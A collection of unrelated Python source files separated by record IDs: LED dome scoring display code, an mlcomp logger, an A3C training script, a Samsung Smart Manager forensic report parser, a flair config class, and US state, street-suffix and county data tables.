        #     sys.exit()
        #
        # elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 6: #EVALUATION_MODE_ILLUMINATION_WEIGHT:
        #     raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
        #     sys.exit()
        #
        #     kwords = {}
        #     evaluate_minimised_distance_to_neighbours( camerasVertices, triangles, kwords )
def draw_selected_leds( camerasVertices, triangles, shape_name ):
    """Render the target shape's faces and overlay a HUD summarising the
    currently loaded score data (score, file, LED/camera/target stats)."""
    best_LEDs = get_best_leds_from_file()
    score = get_best_score(best_LEDs)
    # leds = draw_dome( scale , show_selected_leds=best_LEDs )
    leds = []
    qty_leds = len(best_LEDs) if type(best_LEDs) is list else -1
    filename = LED_SCORE_LOG_FILE if os.path.exists(LED_SCORE_LOG_FILE) else "(Press L to load file)"
    for tri in triangles:
        make_triangle_face( tri )
    hud_lines = [
        "Data file "+str(SCORE_DESCRIPTION)+": "+str(round(score,2)),
        "Data file: "+str(filename),
        "",
        "LED Qty: "+str(qty_leds),
        "Camera Qty: "+str(len(camerasVertices))+" "+str(CAMERA_SHORT_DESCRIPTION),
        "Target Model: "+str(shape_name),
        "Target Scaling Factor: "+str(TARGET_SCALE),
        "Target Translation: "+str(TARGET_TRANSLATION),
        "Target Tri Qty: "+str(len(triangles)),
    ]
    # Draw bottom-up so the first entry ends up at the top of the HUD stack.
    for row, text in enumerate(reversed(hud_lines)):
        draw_text(text, 20, 20 + (row * 15))
def get_target_shape_triangles():
    """Load (and cache) the target shape's faces, defaulting to the bundled dome.

    Returns:
        (TARGET_TRIANGLES, TARGET_SHAPE_NAME): the cached face list and name.
    """
    global TARGET_TRIANGLES, TARGET_SHAPE, TARGET_SHAPE_NAME, TARGET_TRANSLATION
    # Here be dragons..
    # Defaults used when no target shape was supplied on the command line.
    filename = "../models/dome/dome_c.obj"
    shape_name = "Dome"
    dome_scale = 1
    if TARGET_TRIANGLES is None:  # PEP 8: compare to None with 'is', not '=='
        # At time of writing (05/2017), the hardcoded dome model's face mappings are not correct;
        # that model is incomplete. Therefore, we __must__ use the loaded dome from file, in order to evaluate.
        filename = TARGET_SHAPE if TARGET_SHAPE is not None else filename
        scale = TARGET_SCALE if TARGET_SCALE is not None else dome_scale
        TARGET_SHAPE_NAME = os.path.basename(TARGET_SHAPE) if TARGET_SHAPE is not None else shape_name
        # triangles = obj_model_reader.get_all_object_triangles(filename=filename, scale=scale, translation=TARGET_TRANSLATION)
        triangles = obj_model_reader.get_all_object_polyfaces( filename, scale, translation=TARGET_TRANSLATION )
        checkShapeValidity( triangles )
        TARGET_TRIANGLES = triangles
    return TARGET_TRIANGLES, TARGET_SHAPE_NAME
def load_score_file():
    """Populate the score-data globals from LED_SCORE_LOG_FILE.

    Both globals are cleared to None when best-LED selection is disabled.
    """
    global BEST_LED_DATA, BEST_LED_DATA_HEADER
    if SELECT_BEST_LEDS:
        BEST_LED_DATA_HEADER = file_io.read_in_csv_file_header_to_list(LED_SCORE_LOG_FILE)
        BEST_LED_DATA = file_io.read_in_csv_file_to_list_of_lists(LED_SCORE_LOG_FILE, skip_header=True)
    else:
        BEST_LED_DATA_HEADER = None
        BEST_LED_DATA = None
def get_best_leds_from_file():
    """Return the cached best-LED selection, lazily loading the score file.

    On first use the score CSV is loaded (if it exists); BEST_LEDS is then
    derived from the configured metric column. Returns None when no data is
    available.
    """
    global BEST_LEDS, BEST_LED_DATA
    # PEP 8: use identity checks against None ('is'/'is not'), not '=='/'!='.
    if BEST_LEDS is None and BEST_LED_DATA is None:  # 1) nothing cached yet
        if os.path.exists(LED_SCORE_LOG_FILE):  # load the data file if present
            load_score_file()
        # else: file doesn't exist — continue with no data.
    if BEST_LEDS is None and BEST_LED_DATA is not None:
        if USE_SHADING_SCORE or USE_COVERAGE_SCORE:
            BEST_LEDS = get_sorted_column_from_result_file( BEST_LED_DATA, CSV_METRIC_COLUMN_INDEX, QTY_OF_BEST_LEDS_REQUIRED )
            # try_to_verify_symmetry( BEST_LED_DATA, column_index=3 )
    return BEST_LEDS
def get_best_score(best_LEDs):
    """Compute the aggregate score for the given LED index selection.

    Args:
        best_LEDs: list of row indices into BEST_LED_DATA, or None.

    Returns:
        Sum of the metric column in shading mode; the coverage error parsed
        from the CSV header in coverage mode; -1 when no data is loaded or
        the header value cannot be parsed.

    Raises:
        ValueError: when neither scoring mode is active.
    """
    v = -1
    if best_LEDs is not None:  # PEP 8 identity check (was '!= None')
        if USE_SHADING_SCORE:
            # Accumulate the reflection score per selected LED entry.
            v = sum(float(BEST_LED_DATA[i][CSV_METRIC_COLUMN_INDEX]) for i in best_LEDs)
        elif USE_COVERAGE_SCORE:
            try:
                v = int(BEST_LED_DATA_HEADER[3].replace('coverage_error=', ''))
            except ValueError:
                pass  # malformed header: keep the -1 sentinel
        else:
            raise ValueError("Invalid scoring metric selected..")
    return v
|
1690316
|
import os
import logging
import sys
from logging.handlers import RotatingFileHandler
from mlcomp import LOG_FOLDER, LOG_NAME, FILE_LOG_LEVEL, DB_LOG_LEVEL, \
CONSOLE_LOG_LEVEL
from mlcomp.db.core import Session
from mlcomp.db.providers import LogProvider
from mlcomp.db.models import Log
from mlcomp.utils.misc import now
ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
class Formatter(logging.Formatter):
    # Project-aware formatter. Records raised outside the project tree (ROOT)
    # use the stock logging.Formatter behaviour; project records re-implement
    # Formatter.format but tolerate %-interpolation failures, because project
    # records carry structured args (component, computer, task, step — see
    # DbHandler.emit) rather than printf arguments.
    def format(self, record):
        """Format a record to text; never raises on bad %-args."""
        if not record.pathname.startswith(ROOT):
            try:
                return super().format(record)
            except Exception:
                # Fall back to the raw message if stock formatting fails.
                return record.msg

        msg = str(record.msg)
        if record.args:
            try:
                msg = msg % record.args
            except Exception:
                # Structured args are not printf args; keep the plain message.
                pass

        record.message = msg
        if self.usesTime():
            record.asctime = self.formatTime(record, self.datefmt)
        s = self.formatMessage(record)
        if record.exc_info:
            # Cache the traceback text to avoid converting it multiple times
            # (it's constant anyway)
            if not record.exc_text:
                record.exc_text = self.formatException(record.exc_info)
        if record.exc_text:
            if s[-1:] != '\n':
                s = s + '\n'
            s = s + record.exc_text
        if record.stack_info:
            if s[-1:] != '\n':
                s = s + '\n'
            s = s + self.formatStack(record.stack_info)
        return s
class DbHandler(logging.Handler):
    """
    A handler class which writes logging records, appropriately formatted,
    to the database.
    """

    def __init__(self, session: Session):
        """
        Initialize the handler.

        Args:
            session: database session used to build the LogProvider.
        """
        logging.Handler.__init__(self)
        self.provider = LogProvider(session)

    def emit(self, record):
        """
        Emit a record.

        Only records originating inside the project tree (ROOT) are stored.
        ``record.args`` must carry 1-4 positional values interpreted as
        (component[, computer[, task[, step]]]). Any failure is routed to
        ``handleError`` so logging never raises into the caller.
        """
        try:
            if not record.pathname.startswith(ROOT):
                return

            # Fixed assertion message (was the garbled "Args weer not been
            # provided for logging").
            assert 1 <= len(record.args), \
                'Args were not provided for logging'
            assert len(record.args) <= 4, 'Too many args for logging'

            step = None
            task = None
            computer = None

            if len(record.args) == 1:
                component = record.args[0]
            elif len(record.args) == 2:
                component, computer = record.args
            elif len(record.args) == 3:
                component, computer, task = record.args
            else:
                component, computer, task, step = record.args

            # Component may arrive as an enum; store its underlying value.
            if not isinstance(component, int):
                component = component.value

            # Derive a dotted module path relative to the project root.
            module = os.path.relpath(record.pathname, ROOT). \
                replace(os.sep, '.').replace('.py', '')
            if record.funcName and record.funcName != '<module>':
                module = f'{module}:{record.funcName}'

            log = Log(
                message=record.msg[-16000:],  # cap size for the DB column
                time=now(),
                level=record.levelno,
                step=step,
                component=component,
                line=record.lineno,
                module=module,
                task=task,
                computer=computer
            )
            self.provider.add(log)
        except Exception:
            self.handleError(record)
def create_logger(session: Session, name: str, db=True, file=True,
                  console=True):
    """Build a standalone logger with console/file/db handlers.

    Args:
        session: DB session for the DbHandler (used only when ``db`` is True).
        name: logger name.
        db, file, console: which handlers to attach.

    Returns:
        A ``logging.Logger`` instance (constructed directly, so it is not
        registered in the logging manager).
    """
    logger = logging.Logger(name)
    logger.handlers = []

    if console:
        # Configure via constructor args instead of poking attributes
        # afterwards (the original assigned .stream post-construction).
        console_handler = logging.StreamHandler(stream=sys.stdout)
        console_handler.setLevel(CONSOLE_LOG_LEVEL)
        logger.handlers.append(console_handler)

    if file:
        file_path = os.path.join(LOG_FOLDER, f'{LOG_NAME}.txt')
        file_handler = RotatingFileHandler(file_path, maxBytes=10485760,
                                           backupCount=1)
        file_handler.setLevel(FILE_LOG_LEVEL)
        logger.handlers.append(file_handler)

    if db:
        handler = DbHandler(session)
        handler.setLevel(DB_LOG_LEVEL)
        logger.handlers.append(handler)

    for h in logger.handlers:
        fmt = '%(asctime)s.%(msecs)03d %(levelname)s' \
              ' %(module)s - %(funcName)s: %(message)s'
        datefmt = '%Y-%m-%d %H:%M:%S'
        if isinstance(h, DbHandler):
            # DbHandler stores structured fields; no text formatting needed.
            fmt, datefmt = None, None
        h.formatter = Formatter(fmt=fmt, datefmt=datefmt)

    # ignore messages from some libraries
    class NoRunningFilter(logging.Filter):
        # Drops the periodic "ran tasks" heartbeat messages.
        def filter(self, record):
            return 'ran tasks' not in str(record.msg)

    for k in logging.root.manager.loggerDict:
        if 'apscheduler' in k:
            logging.getLogger(k).setLevel(logging.ERROR)
        if 'mlcomp' in k:
            logging.getLogger(k).addFilter(NoRunningFilter())
        if 'serializer' in k:
            logging.getLogger(k).setLevel(logging.ERROR)

    return logger
__all__ = ['create_logger']
|
1690329
|
import multiprocessing
import os
import time
import gym
import numpy as np
import tensorflow as tf
import tensorlayer as tl
from RLToolbox.toolbox.common.utils import *
from RLToolbox.agent.A3C_agent import A3CAgent
from RLToolbox.storage.storage_continous_parallel import ParallelStorage
from RLToolbox.toolbox.baseline.baseline_zeros import Baseline
from RLToolbox.toolbox.distribution.diagonal_gaussian import DiagonalGaussian
from RLToolbox.environment.gym_environment import Environment
from parameters import PMS_base
class NetworkTLAction(object):
    # Policy (actor) network: two 64-unit ReLU dense layers producing action
    # means, plus a trainable log-std parameter tiled across the batch.
    # NOTE: reads module-level `pms` (assigned in the __main__ block below);
    # uses pre-1.0 TensorFlow APIs (tf.pack, tf.placeholder).
    def __init__(self, scope):
        # scope: name prefix for the variable scope and all layer/op names.
        with tf.variable_scope("%s_shared" % scope):
            # Placeholders for observations, taken actions and advantages.
            self.states = tf.placeholder(
                tf.float32 , shape=[None] + pms.obs_shape , name="%s_obs" % scope)
            self.action_n = tf.placeholder(tf.float32 , shape=[None , pms.action_shape] , name="%s_action" % scope)
            self.advant = tf.placeholder(tf.float32 , shape=[None] , name="%s_advant" % scope)
            network = tl.layers.InputLayer(self.states , name='%s_input_layer'%scope)
            network = tl.layers.DenseLayer(network , n_units=64 ,
                                           act=tf.nn.relu , name="%s_fc1"%scope)
            network = tl.layers.DenseLayer(network , n_units=64 ,
                                           act=tf.nn.relu , name="%s_fc2"%scope)
            network = tl.layers.DenseLayer(network , n_units=pms.action_shape,
                                           name="%s_fc3"%scope)
            self.action_dist_means_n = network.outputs
            # Log-std initialised near zero; shared across all batch rows.
            self.action_dist_logstd_param = tf.Variable(
                (.01 * np.random.randn(1 , pms.action_shape)).astype(np.float32) , name="%spolicy_logstd" % scope)
            # self.action_dist_logstd_param = tf.maximum(self.action_dist_logstd_param, np.log(pms.min_std))
            # Tile the single log-std row to match the batch dimension.
            self.action_dist_logstds_n = tf.tile(self.action_dist_logstd_param ,
                                                 tf.pack((tf.shape(self.action_dist_means_n)[0] , 1)))
            # All trainable variables created under this scope.
            self.var_list = [v for v in tf.trainable_variables() if v.name.startswith(scope)]
class NetworkTLValue(object):
    # Value (critic) network: a single 64-unit ReLU dense layer followed by a
    # scalar output. Reads module-level `pms` (assigned in __main__ below).
    def __init__(self, scope):
        # scope: name prefix for the variable scope and all layer/op names.
        with tf.variable_scope("%s_shared" % scope):
            self.states = tf.placeholder(
                tf.float32 , shape=[None] + pms.obs_shape , name="%s_obs" % scope)
            # Placeholder for the discounted-return targets.
            self.R = tf.placeholder(tf.float32 , shape=[None] , name="%s_R" % scope)
            network = tl.layers.InputLayer(self.states , name='%s_input_layer'%scope)
            network = tl.layers.DenseLayer(network , n_units=64,
                                           act=tf.nn.relu , name="%s_fc1"%scope)
            # network = tl.layers.DenseLayer(network , n_units=64 ,
            #                                act=tf.nn.relu , name="%s_fc2"%scope)
            network = tl.layers.DenseLayer(network , n_units=1,name="%s_fc3"%scope)
            self.value = network.outputs
            # All trainable variables created under this scope.
            self.var_list = [v for v in tf.trainable_variables() if v.name.startswith(scope)]
if __name__ == "__main__":
    # --- Runtime configuration; `pms` is also read by the Network* classes above.
    pms = PMS_base()
    pms.train_flag = True
    pms.load_model_before_train = False
    pms.render = False
    args = pms
    if not os.path.isdir(pms.checkpoint_dir):
        os.makedirs(pms.checkpoint_dir)
    if not os.path.isdir("./log"):
        os.makedirs("./log")
    # Component classes used to assemble the A3C setup.
    params = {"environment":Environment,
              "baseline":Baseline,
              "distribution":DiagonalGaussian,
              "storage":ParallelStorage,
              "agent":A3CAgent}
    args.max_pathlength = gym.spec(args.environment_name).timestep_limit
    # Task/result queues shared with the learner processes.
    learner_tasks = multiprocessing.JoinableQueue()
    learner_results = multiprocessing.Queue()
    learner_env = params["environment"]
    net = dict(action_net=NetworkTLAction("action"), value_net=NetworkTLValue("value"))
    baseline = params["baseline"]()
    distribution = params["distribution"](pms.action_shape)
    learners = []
    # Spawn 4 learner processes sharing the same queues and network spec.
    for i in xrange(4):
        learner = params["agent"](learner_env, session=None, baseline=baseline, storage=None, distribution=distribution, net=net, pms=pms, task_q=learner_tasks, result_q=learner_results, process_id=i)
        learners.append(learner)
    for learner in learners:
        learner.start()
    if pms.load_model_before_train:
        # Resume from the checkpointed parameter vectors.
        data = np.load(os.path.join(pms.checkpoint_dir, "model.npz"))
        theta = data["theta"]
        theta_v = data["theta_v"]
    else:
        # Ask a learner for freshly initialised parameters.
        learner_tasks.put(dict(type="GET_PARAM"))
        learner_tasks.join()
        theta, theta_v = learner_results.get()
    if pms.train_flag:
        for i in xrange(pms.max_iter_number):
            print "#############%d###########" % i
            if i % pms.save_model_times == 0 and i != 0:
                ## save model
                print "save_checkpoint"
                # learner_tasks.put(dict(type="GET_PARAM"))
                # learner_tasks.join()
                # theta, theta_v = learner_results.get()
                np.savez(os.path.join(pms.checkpoint_dir, "model.npz"), theta=theta, theta_v=theta_v)
            # Broadcast current parameters; each job computes a gradient delta.
            for k in xrange(pms.jobs):
                command = dict(type="TRAIN", action_param=theta, value_param=theta_v)
                learner_tasks.put(command)
            learner_tasks.join()
            thetas = []
            theta_vs = []
            for k in xrange(pms.jobs):
                delta_theta, delta_theta_v = learner_results.get()
                thetas.append(delta_theta)
                theta_vs.append(delta_theta_v)
            # update net
            # Apply the summed deltas from all jobs to the shared parameters.
            theta += np.array(thetas).sum(axis=0)
            theta_v += np.array(theta_vs).sum(axis=0)
            # print "theta:" + str(theta)
            # print "theta_v" + str(theta_v)
            print
    else:
        # Test mode: run 20 evaluation episodes with the loaded parameters.
        for k in xrange(20):
            command = dict(type="TEST", action_param=theta, value_param=theta_v)
            learner_tasks.put(command)
        learner_tasks.join()
    # Tell every learner process to stop, wait for them, then exit.
    for k in xrange(pms.jobs):
        command = dict(type="STOP", action_param=theta, value_param=theta_v)
        learner_tasks.put(command)
    learner_tasks.join()
    exit()
|
1690337
|
import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_smanagerLow(files_found, report_folder, seeker, wrap_text):
    """Report usage_log rows from the Samsung Smart Manager database as
    HTML, TSV and timeline artifacts."""
    source_db = str(files_found[0])
    db = open_sqlite_db_readonly(source_db)
    cursor = db.cursor()
    cursor.execute('''
    SELECT
    datetime(start_time /1000, "unixepoch"),
    datetime(end_time /1000, "unixepoch"),
    id,
    package_name,
    uploaded,
    datetime(created_at /1000, "unixepoch"),
    datetime(modified_at /1000, "unixepoch")
    from usage_log
    ''')

    all_rows = cursor.fetchall()
    if len(all_rows) > 0:
        report = ArtifactHtmlReport('Samsung Smart Manager - Usage')
        report.start_artifact_report(report_folder, 'Samsung Smart Manager - Usage')
        report.add_script()
        data_headers = ('Start Time','End Time','ID','Package Name', 'Uploaded?', 'Created', 'Modified' )
        data_list = [(row[0], row[1], row[2], row[3], row[4], row[5], row[6])
                     for row in all_rows]

        report.write_artifact_data_table(data_headers, data_list, source_db)
        report.end_artifact_report()

        tsv(report_folder, data_headers, data_list, 'samsung smart manager - usage')
        timeline(report_folder, 'Samsung Smart Manager - Usage', data_list, data_headers)
    else:
        logfunc('No Samsung Smart Manager - Usage data available')

    db.close()
    return
|
1690344
|
import json
import argparse
import yaml
import copy
from flair.utils import logging
from flair.algorithms import dict_merge
logger = logging.init_logger()
class Params(object):
    """
    A dict-like container for (possibly nested) configuration parameters.
    """

    def __init__(self, params):
        # params: nested dict of configuration values.
        self.params = params

    def __eq__(self, other):
        """Compare flattened parameter dicts, ignoring 'environment.recover'.

        Every difference found is logged; returns True only when both sides
        define the same keys with equal values.
        """
        if not isinstance(other, Params):
            logger.info('The params you compare is not an instance of Params. ({} != {})'.format(
                type(self), type(other)
            ))
            return False
        this_flat_params = self.as_flat_dict()
        other_flat_params = other.as_flat_dict()
        if len(this_flat_params) != len(other_flat_params):
            logger.info('The numbers of parameters are different: {} != {}'.format(
                len(this_flat_params),
                len(other_flat_params)
            ))
            return False
        same = True
        for k, v in this_flat_params.items():
            if k == 'environment.recover':
                continue
            if k not in other_flat_params:
                logger.info('The parameter "{}" is not specified.'.format(k))
                same = False
            elif other_flat_params[k] != v:
                # Fixed message wording (was the garbled "not not the same").
                logger.info('The values of "{}" are not the same: {} != {}'.format(
                    k, v, other_flat_params[k]
                ))
                same = False
        return same

    def __getitem__(self, item):
        if item in self.params:
            return self.params[item]
        else:
            # Include the missing key in the exception for easier debugging.
            raise KeyError(item)

    def __setitem__(self, key, value):
        self.params[key] = value

    def __delitem__(self, key):
        del self.params[key]

    def __iter__(self):
        return iter(self.params)

    def __len__(self):
        return len(self.params)

    def items(self):
        return self.params.items()

    def get(self, key, default=None):
        """Return ``self.params[key]`` or ``default`` when absent."""
        return self.params.get(key, default)

    def as_flat_dict(self):
        """
        Returns the parameters of a flat dictionary from keys to values.
        Nested structure is collapsed with periods.
        """
        flat_params = {}

        def recurse(parameters, path):
            for key, value in parameters.items():
                newpath = path + [key]
                if isinstance(value, dict):
                    recurse(value, newpath)
                else:
                    flat_params['.'.join(newpath)] = value

        recurse(self.params, [])
        return flat_params

    def to_file(self, output_json_file):
        """Serialise the parameters to ``output_json_file`` as indented JSON."""
        with open(output_json_file, 'w', encoding='utf-8') as f:
            json.dump(self.params, f, indent='\t')

    @classmethod
    def from_file(cls, params_file_list):
        """Load parameters from a comma-separated list of .yaml/.json files.

        YAML files are deep-merged in order. NOTE(review): a JSON file
        *replaces* everything loaded so far instead of merging — this is
        inconsistent with the YAML branch but kept for backward compatibility.
        """
        params_file_list = params_file_list.split(",")
        params_dict = {}
        for params_file in params_file_list:
            with open(params_file, encoding='utf-8') as f:
                if params_file.endswith('.yaml'):
                    # WARNING: yaml.load without an explicit Loader is unsafe
                    # on untrusted input; consider yaml.safe_load.
                    dict_merge.dict_merge(params_dict, yaml.load(f))
                elif params_file.endswith('.json'):
                    params_dict = json.load(f)
                else:
                    raise NotImplementedError
        return cls(params_dict)

    def __repr__(self):
        return json.dumps(self.params, indent=2)

    def duplicate(self) -> 'Params':
        """
        Uses ``copy.deepcopy()`` to create a duplicate (but fully distinct)
        copy of these Params.
        """
        return Params(copy.deepcopy(self.params))
def remove_pretrained_embedding_params(params):
    """Recursively set every 'pretrained_file' entry of a nested dict to None."""
    target_key = 'pretrained_file'

    def _scrub(node):
        for name, value in node.items():
            if name == target_key:
                node[name] = None
            elif isinstance(value, dict):
                _scrub(value)

    _scrub(params)
|
1690359
|
# (abbreviation, full name) pairs for US states, DC and the Virgin Islands,
# ordered alphabetically by abbreviation.
STATES = (
    ('AK', 'Alaska'),
    ('AL', 'Alabama'),
    ('AR', 'Arkansas'),
    ('AZ', 'Arizona'),
    ('CA', 'California'),
    ('CO', 'Colorado'),
    ('CT', 'Connecticut'),
    ('DC', 'District of Columbia'),
    ('DE', 'Delaware'),
    ('FL', 'Florida'),
    ('GA', 'Georgia'),
    ('HI', 'Hawaii'),
    ('IA', 'Iowa'),
    ('ID', 'Idaho'),
    ('IL', 'Illinois'),
    ('IN', 'Indiana'),
    ('KS', 'Kansas'),
    ('KY', 'Kentucky'),
    ('LA', 'Louisiana'),
    ('MA', 'Massachusetts'),
    ('MD', 'Maryland'),
    ('ME', 'Maine'),
    ('MI', 'Michigan'),
    ('MN', 'Minnesota'),
    ('MO', 'Missouri'),
    ('MS', 'Mississippi'),
    ('MT', 'Montana'),
    ('NC', 'North Carolina'),
    ('ND', 'North Dakota'),
    ('NE', 'Nebraska'),
    ('NH', 'New Hampshire'),
    ('NJ', 'New Jersey'),
    ('NM', 'New Mexico'),
    ('NV', 'Nevada'),
    ('NY', 'New York'),
    ('OH', 'Ohio'),
    ('OK', 'Oklahoma'),
    ('OR', 'Oregon'),
    ('PA', 'Pennsylvania'),
    ('RI', 'Rhode Island'),
    ('SC', 'South Carolina'),
    ('SD', 'South Dakota'),
    ('TN', 'Tennessee'),
    ('TX', 'Texas'),
    ('UT', 'Utah'),
    ('VA', 'Virginia'),
    ('VI', 'Virgin Islands'),
    ('VT', 'Vermont'),
    ('WA', 'Washington'),
    ('WI', 'Wisconsin'),
    ('WV', 'West Virginia'),
    ('WY', 'Wyoming'),
)
# Number of entries in STATES.
NUM_STATES = len(STATES)
# Street-type suffixes used when generating synthetic street addresses.
STREET_SUFFIX = (
    'Alley',
    'Annex',
    'Arcade',
    'Avenue',
    'Bend',
    'Bay',
    'Brae',
    'Boulevard',
    'Bypass',
    'Circle',
    'Close',
    'Concession',
    'Court',
    'Cove',
    'Crescent',
    'Drive',
    'Drung',
    'Esplanade',
    'Expressway',
    'Extension',
    'Ferry',
    'Field',
    'Freeway',
    'Garden',
    'Gardens',
    'Gate',
    'Glen',
    'Green',
    'Grove',
    'Heights',
    'High',
    'Highway',
    'Hill',
    'Lane',
    'Line',
    'Loop',
    'Mall',
    'Manor',
    'Mews',
    'Nene',
    'Parade',
    'Park',
    'Parkway',
    'Path',
    'Pike',
    'Place',
    'Plantation',
    'Plaza',
    'Point',
    'Private',
    'Promenade',
    'Road',
    'Side',
    'Sideline',
    'Route',
    'Row',
    'Run',
    'Spur',
    'Square',
    'Stravenue',
    'Street',
    'Terrace',
    'Thruway',
    'Trace',
    'Trail',
    'Turnpike',
    'Townline',
    'Viaduct',
    'Walk',
    'Way',
    'Wood',
    'Wynd',
)
# Number of entries in STREET_SUFFIX.
NUM_STREET_SUFFIXES = len(STREET_SUFFIX)
# Value domains for generated demographic/catalog attributes.
YEARS = 1998, 1999, 2000, 2001, 2002
GENDERS = 'M', 'F'
# D=divorced, M=married, S=single, U=unknown, W=widowed — presumably; TODO confirm
MARITAL_STATUSES = 'D', 'M', 'S', 'U', 'W'
EDUCATION_STATUSES = (
    '2 yr Degree',
    '4 yr Degree',
    'Advanced Degree',
    'College',
    'Primary',
    'Secondary',
    'Unknown',
)
# Product categories available in the generated catalog.
CATEGORIES = (
    'Books',
    'Children',
    'Electronics',
    'Home',
    'Jewelry',
    'Men',
    'Music',
    'Shoes',
    'Sports',
    'Women',
)
COUNTIES = (
'Abbeville County',
'Acadia Parish',
'Accomack County',
'Ada County',
'Adair County',
'Adams County',
'Addison County',
'Aiken County',
'Aitkin County',
'Alachua County',
'Alamance County',
'Alameda County',
'Alamosa County',
'Albany County',
'Albemarle County',
'Alcona County',
'Alcorn County',
'Aleutians East Borough',
'Aleutians West Census Area',
'Alexander County',
'Alexandria city',
'Alfalfa County',
'Alger County',
'Allamakee County',
'Allegan County',
'Allegany County',
'Alleghany County',
'Allegheny County',
'Allen County',
'Allendale County',
'Allen Parish',
'Alpena County',
'Alpine County',
'Amador County',
'Amelia County',
'Amherst County',
'Amite County',
'Anchorage Borough',
'Anderson County',
'Andrew County',
'Andrews County',
'Androscoggin County',
'Angelina County',
'Anne Arundel County',
'Anoka County',
'Anson County',
'Antelope County',
'Antrim County',
'Apache County',
'Appanoose County',
'Appling County',
'Appomattox County',
'Aransas County',
'Arapahoe County',
'Archer County',
'Archuleta County',
'Arenac County',
'Arkansas County',
'Arlington County',
'Armstrong County',
'Aroostook County',
'Arthur County',
'Ascension Parish',
'Ashe County',
'Ashland County',
'Ashley County',
'Ashtabula County',
'Asotin County',
'Assumption Parish',
'Atascosa County',
'Atchison County',
'Athens County',
'Atkinson County',
'Atlantic County',
'Atoka County',
'Attala County',
'Audrain County',
'Audubon County',
'Auglaize County',
'Augusta County',
'Aurora County',
'Austin County',
'Autauga County',
'Avery County',
'Avoyelles Parish',
'Baca County',
'Bacon County',
'Bailey County',
'Baker County',
'Baldwin County',
'Ballard County',
'Baltimore city',
'Baltimore County',
'Bamberg County',
'Bandera County',
'Banks County',
'Banner County',
'Bannock County',
'Baraga County',
'Barber County',
'Barbour County',
'Barnes County',
'Barnstable County',
'Barnwell County',
'Barren County',
'Barron County',
'Barrow County',
'Barry County',
'Bartholomew County',
'Barton County',
'Bartow County',
'Bastrop County',
'Bates County',
'Bath County',
'Baxter County',
'Bay County',
'Bayfield County',
'Baylor County',
'Beadle County',
'Bear Lake County',
'Beaufort County',
'Beauregard Parish',
'Beaver County',
'Beaverhead County',
'Becker County',
'Beckham County',
'Bedford city',
'Bedford County',
'Bee County',
'Belknap County',
'Bell County',
'Belmont County',
'Beltrami County',
'Benewah County',
'Ben Hill County',
'Bennett County',
'Bennington County',
'Benson County',
'Bent County',
'Benton County',
'Benzie County',
'Bergen County',
'Berkeley County',
'Berks County',
'Berkshire County',
'Bernalillo County',
'Berrien County',
'Bertie County',
'Bethel Census Area',
'Bexar County',
'Bibb County',
'Bienville Parish',
'Big Horn County',
'Big Stone County',
'Billings County',
'Bingham County',
'Blackford County',
'Black Hawk County',
'Bladen County',
'Blaine County',
'Blair County',
'Blanco County',
'Bland County',
'Bleckley County',
'Bledsoe County',
'Blount County',
'Blue Earth County',
'Boise County',
'Bolivar County',
'Bollinger County',
'Bond County',
'Bon Homme County',
'Bonner County',
'Bonneville County',
'Boone County',
'Borden County',
'Bosque County',
'Bossier Parish',
'Botetourt County',
'Bottineau County',
'Boulder County',
'Boundary County',
'Bourbon County',
'Bowie County',
'Bowman County',
'Box Butte County',
'Box Elder County',
'Boyd County',
'Boyle County',
'Bracken County',
'Bradford County',
'Bradley County',
'Branch County',
'Brantley County',
'Braxton County',
'Brazoria County',
'Brazos County',
'Breathitt County',
'Breckinridge County',
'Bremer County',
'Brevard County',
'Brewster County',
'Briscoe County',
'Bristol Bay Borough',
'Bristol city',
'Bristol County',
'Broadwater County',
'Bronx County',
'Brooke County',
'Brookings County',
'Brooks County',
'Broome County',
'Broward County',
'Brown County',
'Brule County',
'Brunswick County',
'Bryan County',
'Buchanan County',
'Buckingham County',
'Bucks County',
'Buena Vista city',
'Buena Vista County',
'Buffalo County',
'Bullitt County',
'Bulloch County',
'Bullock County',
'Buncombe County',
'Bureau County',
'Burke County',
'Burleigh County',
'Burleson County',
'Burlington County',
'Burnet County',
'Burnett County',
'Burt County',
'Butler County',
'Butte County',
'Butts County',
'Cabarrus County',
'Cabell County',
'Cache County',
'Caddo County',
'Caddo Parish',
'Calaveras County',
'Calcasieu Parish',
'Caldwell County',
'Caldwell Parish',
'Caledonia County',
'Calhoun County',
'Callahan County',
'Callaway County',
'Calloway County',
'Calumet County',
'Calvert County',
'Camas County',
'Cambria County',
'Camden County',
'Cameron County',
'Cameron Parish',
'Campbell County',
'Camp County',
'Canadian County',
'Candler County',
'Cannon County',
'Canyon County',
'Cape Girardeau County',
'Cape May County',
'Carbon County',
'Caribou County',
'Carlisle County',
'Carlton County',
'Caroline County',
'Carroll County',
'Carson City',
'Carson County',
'Carter County',
'Carteret County',
'Carver County',
'Cascade County',
'Casey County',
'Cass County',
'Cassia County',
'Castro County',
'Caswell County',
'Catahoula Parish',
'Catawba County',
'Catoosa County',
'Catron County',
'Cattaraugus County',
'Cavalier County',
'Cayuga County',
'Cecil County',
'Cedar County',
'Centre County',
'Cerro Gordo County',
'Chaffee County',
'Chambers County',
'Champaign County',
'Chariton County',
'Charle',
'Charles City County',
'Charles County',
'Charles Mix County',
'Charleston County',
'Charlevoix County',
'Charlotte County',
'Charlottesville city',
'Charlton County',
'Chase County',
'Chatham County',
'Chattahoochee County',
'Chattooga County',
'Chautauqua County',
'Chaves County',
'Cheatham County',
'Cheboygan County',
'Chelan County',
'Chemung County',
'Chenango County',
'Cherokee County',
'Cherry County',
'Chesapeake city',
'Cheshire County',
'Chester County',
'Chesterfield County',
'Cheyenne County',
'Chickasaw County',
'Chicot County',
'Childress County',
'Chilton County',
'Chippewa County',
'Chisago County',
'Chittenden County',
'Choctaw County',
'Chouteau County',
'Chowan County',
'Christian County',
'Churchill County',
'Cibola County',
'Cimarron County',
'Citrus County',
'Clackamas County',
'Claiborne County',
'Claiborne Parish',
'Clallam County',
'Clare County',
'Clarendon County',
'Clarion County',
'Clark County',
'Clarke County',
'Clatsop County',
'Clay County',
'Clayton County',
'Clear Creek County',
'Clearfield County',
'Clearwater County',
'Cleburne County',
'Clermont County',
'Cleveland County',
'Clifton Forge city',
'Clinch County',
'Clinton County',
'Cloud County',
'Coahoma County',
'Coal County',
'Cobb County',
'Cochise County',
'Cochran County',
'Cocke County',
